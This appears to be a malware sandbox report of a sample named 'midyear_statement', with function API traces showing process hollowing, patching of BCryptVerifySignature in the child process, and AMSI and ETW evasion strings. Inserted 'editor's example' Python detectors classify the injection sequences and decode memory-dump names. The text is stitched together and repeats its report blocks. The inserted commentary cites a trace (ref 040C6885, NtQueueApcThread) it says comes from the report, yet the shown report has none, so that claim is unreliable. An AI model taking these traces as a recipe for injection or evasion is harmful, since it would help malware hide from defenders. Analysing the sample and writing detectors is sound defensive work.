                                                                                                                                                                                          • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$bcrypt$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                                                                          • API String ID: 2601453139-4169187149
                                                                                                                                                                                          • Opcode ID: 19bf158adfb86830e3e9908d9f3f189ad8a195967712c054973a998f4a66aa91
                                                                                                                                                                                          • Instruction ID: e4a93a957eddac958dbb963bbf766e4d939d24a6b4e1bcb0a8f6fded2960db71
                                                                                                                                                                                          • Opcode Fuzzy Hash: 19bf158adfb86830e3e9908d9f3f189ad8a195967712c054973a998f4a66aa91
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5943F939A41119CFEB14EBA4D880DCEB3B9EF8570CF5546E5A008BB610DB74BEA58F41
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          [Graph for function 40b7ee8; the rendered graph and its executed / not-executed colouring are not reproduced. Basic blocks in listing order: 40b7ee8-40b7eeb; 40b7ef0-40b7ef5 (self-loop); 40b7ef7-40b7fde (calls 40a4900); 40b7fe4-40b80bf; 40b80c5-40b83ed (calls 40a3098 twice, 40a4d50 and 40a4d60, then CreateProcessAsUserW); 40b83ef-40b845b; 40b8460-40b8786 (calls 40a2ee0 and 40a2f08, then GetThreadContext); 40b878c-40b89ef (NtReadVirtualMemory); 40b89f5-40b8b5e (NtUnmapViewOfSection); 40b8b60-40b8b86 and 40b8b88-40b8bf4, both leading to 40b8bf9-40b8cfa (calls 40b78f8, the NtAllocateVirtualMemory wrapper listed below); 40b8cfc-40b8d68; 40b8d6d-40b8eed (calls 40b78f8); 40b8ef3-40b8fec (calls 40b7df8); 40b8fee-40b903b (calls 40b7cf0 and 40b7ce4); 40b9040-40b9946 (NtWriteVirtualMemory, NtWriteVirtualMemory, SetThreadContext, NtResumeThread, then 40a2c2c and seven calls to 40b7a50, the LoadLibraryW / GetProcAddress / NtWriteVirtualMemory / FreeLibrary routine listed below); 40b994b-40b99b5 (epilogue: 40a4494, 40a4bd0, 40a4470). Every API-bearing block also has an edge to the epilogue, so each step can bail out. The 40a47d0 / 40a4910 / 40a4668 / 40a475c / 40b7b88 helper sequence between API calls is omitted.]
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 040B7B88: LoadLibraryW.KERNEL32(?,00000000,040B7C3A), ref: 040B7BB8
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetModuleHandleW.KERNEL32(?,?,00000000,040B7C3A), ref: 040B7BBE
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetProcAddress.KERNEL32(00000000,00000000), ref: 040B7BD7
                                                                                                                                                                                          • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,04100398,04100388,OpenSession,04100360,040B99D0,ScanString,04100360), ref: 040B83E6
                                                                                                                                                                                          • GetThreadContext.KERNEL32(00000868,041003DC,ScanString,04100360,040B99D0,UacInitialize,04100360,040B99D0,ScanBuffer,04100360,040B99D0,ScanBuffer,04100360,040B99D0,UacInitialize,04100360), ref: 040B877F
                                                                                                                                                                                          • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00292FF8,041004B0,00000004,041004B8,ScanBuffer,04100360,040B99D0,ScanString,04100360,040B99D0,Initialize,04100360,040B99D0,UacScan,04100360), ref: 040B89DC
                                                                                                                                                                                          • NtUnmapViewOfSection.N(00000894,00590000,ScanBuffer,04100360,040B99D0,ScanString,04100360,040B99D0,Initialize,04100360,040B99D0,00000894,00292FF8,041004B0,00000004,041004B8), ref: 040B8B57
                                                                                                                                                                                            • Part of subcall function 040B78F8: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 040B7905
                                                                                                                                                                                            • Part of subcall function 040B78F8: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040B790B
                                                                                                                                                                                            • Part of subcall function 040B78F8: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 040B792B
                                                                                                                                                                                          • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00590000,00000000,11D95300,041004B8,ScanBuffer,04100360,040B99D0,ScanString,04100360,040B99D0,Initialize,04100360,040B99D0,ScanBuffer,04100360), ref: 040B91AB
                                                                                                                                                                                          • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00292FF8,041004B4,00000004,041004B8,ScanBuffer,04100360,040B99D0,ScanString,04100360,040B99D0,Initialize,04100360,040B99D0,00000894,00590000), ref: 040B931E
                                                                                                                                                                                          • SetThreadContext.KERNEL32(00000868,041003DC,ScanBuffer,04100360,040B99D0,ScanString,04100360,040B99D0,Initialize,04100360,040B99D0,00000894,00292FF8,041004B4,00000004,041004B8), ref: 040B9494
                                                                                                                                                                                          • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000868,00000000,00000868,041003DC,ScanBuffer,04100360,040B99D0,ScanString,04100360,040B99D0,Initialize,04100360,040B99D0,00000894,00292FF8,041004B4), ref: 040B94A1
                                                                                                                                                                                            • Part of subcall function 040B7A50: LoadLibraryW.KERNEL32(bcrypt,040B99D0,Initialize,04100360,040B99D0,UacScan,04100360,040B99D0,UacInitialize,04100360,040B99D0,00000868,041003DC,ScanString,04100360,040B99D0), ref: 040B7A62
                                                                                                                                                                                            • Part of subcall function 040B7A50: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 040B7A6F
                                                                                                                                                                                            • Part of subcall function 040B7A50: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,040B99D0,Initialize,04100360,040B99D0,UacScan,04100360,040B99D0,UacInitialize), ref: 040B7A86
                                                                                                                                                                                            • Part of subcall function 040B7A50: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,040B99D0,Initialize,04100360,040B99D0,UacScan,04100360,040B99D0,UacInitialize,04100360,040B99D0,00000868,041003DC), ref: 040B7A95
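The two APIs lists above (the function containing ref 040C6885 and the function containing ref 040B83E6) read as two ordered injection sequences, and an analyst triaging many such reports wants that ordering checked mechanically rather than by eye. The following is an editor's example, not code from the report or from the sample: it parses lines in the report's own format, flags the suspended-process creation (dwCreationFlags = 00000004 in both CreateProcessAsUserW calls), and then tests two ordered patterns: GetThreadContext, a remote write, SetThreadContext, resume (process hollowing), and NtQueueApcThread followed by a resume (early-bird APC injection). It also pairs each NtReadVirtualMemory with a later same-size write to the same address, which is how the 4-byte read at 00292FF8 (ref 040B89DC) and the 4-byte write at 00292FF8 (ref 040B931E) surface. The rule names, the parameter positions, and the cut-down argument lists are the editor's assumptions; the argument columns in the report carry stack residue (the repeated ScanBuffer / OpenSession strings), so a size such as 11D95300 on the first write is a hint, not a measurement.

```python
"""Match a Joe Sandbox "APIs" listing against two known injection sequences.

Added example, not code from the report or from the analysed sample. The two
traces are transcribed from the APIs lists of the functions above (a subset
of the lines, each argument list cut to the leading positions the rules use);
rule names and parameter positions are the editor's assumptions, noted inline.
"""
import re
from typing import Dict, List, Optional

# One report line, with or without the "Part of subcall function" prefix.
_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>[^(]+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)

# Function containing ref 040C6885: suspended child, APC queued, thread resumed.
TRACE_APC = r"""
Part of subcall function 040B7B88: GetProcAddress.KERNEL32(00000000,00000000), ref: 040B7BD7
CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 040C6885
NtQueueApcThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,00000000), ref: 040C6D50
ResumeThread.KERNEL32(00000000), ref: 040C6ECF
CloseHandle.KERNEL32(00000000), ref: 040C704E
ExitProcess.KERNEL32(00000000), ref: 040C9301
"""

# Function containing ref 040B83E6: suspended child, image region replaced.
TRACE_HOLLOW = r"""
CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 040B83E6
GetThreadContext.KERNEL32(00000868,041003DC), ref: 040B877F
NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00292FF8,041004B0,00000004,041004B8), ref: 040B89DC
NtUnmapViewOfSection.N(00000894,00590000), ref: 040B8B57
Part of subcall function 040B78F8: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 040B792B
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00590000,00000000,11D95300,041004B8), ref: 040B91AB
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00292FF8,041004B4,00000004,041004B8), ref: 040B931E
SetThreadContext.KERNEL32(00000868,041003DC), ref: 040B9494
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000868,00000000), ref: 040B94A1
Part of subcall function 040B7A50: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00000000,?,00000001,?), ref: 040B7A86
"""

CREATE_SUSPENDED = 0x4  # dwCreationFlags bit; both CreateProcessAsUserW calls pass 00000004
CREATORS = {"CreateProcessA", "CreateProcessW", "CreateProcessAsUserA", "CreateProcessAsUserW"}
WRITERS = {"NtWriteVirtualMemory", "WriteProcessMemory"}
RESUMERS = {"ResumeThread", "NtResumeThread", "NtAlertResumeThread"}
GET_CTX = {"GetThreadContext", "Wow64GetThreadContext"}
SET_CTX = {"SetThreadContext", "Wow64SetThreadContext"}
APC = {"NtQueueApcThread", "QueueUserAPC"}


def parse(text: str) -> List[Dict]:
    """Report lines -> dicts with api, raw args, ref and (optional) subcall address."""
    calls = []
    for line in text.strip().splitlines():
        m = _LINE.match(line.strip())
        if not m:
            raise ValueError(f"unparsed line: {line!r}")
        args = m["args"].split(",") if m["args"] else []
        calls.append({"api": m["api"], "args": args, "ref": m["ref"].upper(), "sub": m["sub"]})
    return calls


def _hex(value: str) -> Optional[int]:
    """Hex argument to int; '?' and symbolic names such as ScanBuffer become None."""
    try:
        return int(value, 16)
    except ValueError:
        return None


def _in_order(apis: List[str], *groups) -> bool:
    """True if one member of each group occurs in the trace, in group order."""
    pos = 0
    for group in groups:
        while pos < len(apis) and apis[pos] not in group:
            pos += 1
        if pos == len(apis):
            return False
        pos += 1
    return True


def classify(text: str) -> Dict:
    calls = parse(text)
    apis = [c["api"] for c in calls]
    result = {"suspended_create": None, "technique": None,
              "remote_writes": [], "readback_rewrite": []}
    for c in calls:  # dwCreationFlags is the 7th parameter of every CreateProcess* variant
        if c["api"] in CREATORS and len(c["args"]) > 6:
            flags = _hex(c["args"][6])
            if flags is not None and flags & CREATE_SUSPENDED:
                result["suspended_create"] = c["ref"]
    # Remote writes as (target, size, ref). A same-size write to an address read
    # earlier is reported separately: the read-modify-write a hollower does on a
    # 4-byte field in the child; only the pattern is reported, not the field.
    reads = {}
    for c in calls:
        if c["api"] == "NtReadVirtualMemory" and len(c["args"]) >= 4:
            reads[(c["args"][1], c["args"][3])] = c["ref"]
        elif c["api"] in WRITERS and len(c["args"]) >= 4:
            result["remote_writes"].append((c["args"][1], _hex(c["args"][3]), c["ref"]))
            if (c["args"][1], c["args"][3]) in reads:
                result["readback_rewrite"].append(
                    (c["args"][1], reads[(c["args"][1], c["args"][3])], c["ref"]))
    if result["suspended_create"]:  # both patterns start from a suspended child
        if _in_order(apis, GET_CTX, WRITERS, SET_CTX, RESUMERS):
            result["technique"] = "process hollowing"
        elif _in_order(apis, APC, RESUMERS):
            result["technique"] = "early-bird APC injection"
    return result
```

`classify(TRACE_HOLLOW)` returns technique "process hollowing" with the 00292FF8 read/write pair, and `classify(TRACE_APC)` returns "early-bird APC injection" with no remote writes at all, which matches the report's own API lists: the APC path never touches the child's memory through a write primitive, so detections keyed only on WriteProcessMemory / NtWriteVirtualMemory would miss it.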
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
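The two Memory Dump Source blocks above list the same five dumped regions, and the numeric fields in each dump name encode what kind of memory the code was lifted from. The following is an editor's example, not code from the report or from the sample, that decodes those names: the field order assumed (process index, a second field that is constant 00000002 here and is not explained on the page, dump id, base address, page protection, region state, region type, a trailing field that is always 00000000 here) is read off the values in the listing rather than taken from a documented Joe Sandbox format, while the PAGE_* and MEM_* values are the Windows constants. The check it performs is the one a practitioner wants: which of the dumped regions are committed private memory with execute rights, i.e. code that is not backed by an image on disk.

```python
"""Decode Joe Sandbox dump names from a "Memory Dump Source" block.

Added example, not code from the report or from the sample. The field order
is an assumption read off the listing (see the lead-in); the PAGE_* and
MEM_* tables are the Windows memory constants.
"""
import re
from typing import Dict, List

PAGE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
        0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
        0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
KIND = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXEC = {0x10, 0x20, 0x40, 0x80}
WRITE = {0x04, 0x08, 0x40, 0x80}

# Copied from the report's Memory Dump Source block; the "Download File" link
# text that the extraction glued onto some names is kept to show it is ignored.
DUMP_LISTING = """
Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
"""

# Assumed field layout: proc.pass.dumpid.base.protect.state.type.reserved.sdmp
_NAME = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<pass_>[0-9A-F]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.(?P<state>[0-9A-F]{8})\."
    r"(?P<kind>[0-9A-F]{8})\.(?P<rsv>[0-9A-F]{8})\.sdmp"
)


def decode(name: str) -> Dict:
    """One dump name -> region facts. Raises on anything that is not a dump name."""
    m = _NAME.search(name)
    if not m:
        raise ValueError(f"not a dump name: {name!r}")
    # Low byte is the access class; PAGE_GUARD / PAGE_NOCACHE modifiers sit above it.
    prot = int(m["prot"], 16) & 0xFF
    return {
        "process": int(m["proc"], 16),
        "dump_id": int(m["dump"]),
        "base": int(m["base"], 16),
        "protect": PAGE.get(prot, f"0x{prot:02X}"),
        "state": STATE.get(int(m["state"], 16), m["state"]),
        "type": KIND.get(int(m["kind"], 16), m["kind"]),
        "executable": prot in EXEC,
        "writable": prot in WRITE,
    }


def decode_all(listing: str) -> List[Dict]:
    """Every dump name in a Memory Dump Source block, in listing order."""
    return [decode(m.group(0)) for m in _NAME.finditer(listing)]


def executable_private(listing: str) -> List[int]:
    """Bases of committed, private, executable regions: code with no image
    backing, which is what unpacked or manually mapped code looks like."""
    return [r["base"] for r in decode_all(listing)
            if r["executable"] and r["state"] == "MEM_COMMIT" and r["type"] == "MEM_PRIVATE"]
```

On this listing `executable_private(DUMP_LISTING)` returns the regions at 040A1000 (PAGE_EXECUTE_READ) and 04100000 (PAGE_EXECUTE_READWRITE), all five regions being MEM_COMMIT and MEM_PRIVATE; together with the read-only page at 040A0000 and the read-write pages at 040CC000 and 041F4000 that is the layout of a PE laid out by hand in private memory, which is consistent with the "based on PE: true" annotation on the first dump.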
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$AllocateCreateFreeProcessReadResumeSectionUnmapUserView
                                                                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                                                                                          • API String ID: 2533507481-2367850715
                                                                                                                                                                                          • Opcode ID: aee14c98fb3a47aa7bb174f0abd6dfee168f2edd272fad84fcbc7b245bb5a4f3
                                                                                                                                                                                          • Instruction ID: b591209a81686d2ed736725af0fb2b1ca598fddfcaaf4bda5a88676f04f68113
                                                                                                                                                                                          • Opcode Fuzzy Hash: aee14c98fb3a47aa7bb174f0abd6dfee168f2edd272fad84fcbc7b245bb5a4f3
                                                                                                                                                                                          • Instruction Fuzzy Hash: A0E21239A411189FEB51EBA4DC80FCEB3B9AF4560CF1041A29148BB614DBB0FE95CF95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          [Graph for the entry at 40b7ee6, two bytes before 40b7ee8; the rendered graph and its executed / not-executed colouring are not reproduced. Apart from the first block (40b7ee6-40b7eeb instead of 40b7ee8-40b7eeb) the blocks, calls and edges repeat the previous graph: CreateProcessAsUserW in 40b80c5-40b83ed, GetThreadContext in 40b8460-40b8786, NtReadVirtualMemory in 40b878c-40b89ef, NtUnmapViewOfSection in 40b89f5-40b8b5e, 40b78f8 (NtAllocateVirtualMemory) from 40b8bf9-40b8cfa and 40b8d6d-40b8eed, then NtWriteVirtualMemory twice, SetThreadContext, NtResumeThread and the 40b7a50 calls in 40b9040-40b9946, with the epilogue at 40b994b-40b99b5. The source listing is cut off inside block 40b9040-40b9946.]
40a475c call 40a4910 call 40b7a50 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 10424->10473 10472->10473 10473->9959
APIs
  • Part of subcall function 040B7B88: LoadLibraryW.KERNEL32(?,00000000,040B7C3A), ref: 040B7BB8
  • Part of subcall function 040B7B88: GetModuleHandleW.KERNEL32(?,?,00000000,040B7C3A), ref: 040B7BBE
  • Part of subcall function 040B7B88: GetProcAddress.KERNEL32(00000000,00000000), ref: 040B7BD7
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,04100398,04100388,OpenSession,04100360,040B99D0,ScanString,04100360), ref: 040B83E6
• GetThreadContext.KERNEL32(00000868,041003DC,ScanString,04100360,040B99D0,UacInitialize,04100360,040B99D0,ScanBuffer,04100360,040B99D0,ScanBuffer,04100360,040B99D0,UacInitialize,04100360), ref: 040B877F
• NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00292FF8,041004B0,00000004,041004B8,ScanBuffer,04100360,040B99D0,ScanString,04100360,040B99D0,Initialize,04100360,040B99D0,UacScan,04100360), ref: 040B89DC
• NtUnmapViewOfSection.N(00000894,00590000,ScanBuffer,04100360,040B99D0,ScanString,04100360,040B99D0,Initialize,04100360,040B99D0,00000894,00292FF8,041004B0,00000004,041004B8), ref: 040B8B57
  • Part of subcall function 040B78F8: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 040B7905
  • Part of subcall function 040B78F8: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040B790B
  • Part of subcall function 040B78F8: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 040B792B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
• API String ID: 3979268988-2367850715
• Opcode ID: f354b93d9f3915233b1a3c959d4edf1be3f13b106eaf1b8bab3133dd86f597fb
• Instruction ID: d87dff25aad9e536427e6eebc7a269ee7c96c0401ebca7355ba3c993cb423689
• Opcode Fuzzy Hash: f354b93d9f3915233b1a3c959d4edf1be3f13b106eaf1b8bab3133dd86f597fb
• Instruction Fuzzy Hash: FFE21339A411189FEB51EBA4DC80FCEB3B9AF4560CF1041A29148BB614DBB0FE95CF95
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Control-flow graph of the function starting at 040A5A3C (graph image with its Executed / Not Executed legend omitted). Windows API calls in this graph: GetModuleFileNameA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, lstrcpynA, GetThreadLocale, GetLocaleInfoA, lstrlenA, LoadLibraryExA.
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000105,040A0000,040CC790), ref: 040A5A58
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,040A0000,040CC790), ref: 040A5A76
• RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,040A0000,040CC790), ref: 040A5A94
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 040A5AB2
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,040A5B41,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 040A5AFB
• RegQueryValueExA.ADVAPI32(?,040A5CA8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,040A5B41,?,80000001), ref: 040A5B19
• RegCloseKey.ADVAPI32(?,040A5B48,00000000,?,?,00000000,040A5B41,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 040A5B3B
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 040A5B58
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 040A5B65
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 040A5B6B
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 040A5B96
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 040A5BDD
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 040A5BED
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 040A5C15
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 040A5C25
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 040A5C4B
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 040A5C5B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1759228003-2375825460
• Opcode ID: 6136e82d8dfd28118471b3525f5d8165c2bcff24087c2ed7f4bd3fb2c3fb3060
• Instruction ID: ed635bd781d7315362e91603cdcea9ebfc3e3b909322b06e7dab74bf7ca09b80
• Opcode Fuzzy Hash: 6136e82d8dfd28118471b3525f5d8165c2bcff24087c2ed7f4bd3fb2c3fb3060
• Instruction Fuzzy Hash: 6D516775A5025C7EFB21D6E48C46FEFB7ECAB04748F4401A1B604FA181E674FB648B60
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Control-flow graph of the function starting at 040B7A50 (graph image with its Executed / Not Executed legend omitted). Windows API calls in this graph: LoadLibraryW, GetProcAddress, NtWriteVirtualMemory, FreeLibrary.
APIs
• LoadLibraryW.KERNEL32(bcrypt,040B99D0,Initialize,04100360,040B99D0,UacScan,04100360,040B99D0,UacInitialize,04100360,040B99D0,00000868,041003DC,ScanString,04100360,040B99D0), ref: 040B7A62
• GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 040B7A6F
• NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,040B99D0,Initialize,04100360,040B99D0,UacScan,04100360,040B99D0,UacInitialize), ref: 040B7A86
• FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,040B99D0,Initialize,04100360,040B99D0,UacScan,04100360,040B99D0,UacInitialize,04100360,040B99D0,00000868,041003DC), ref: 040B7A95
Strings
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
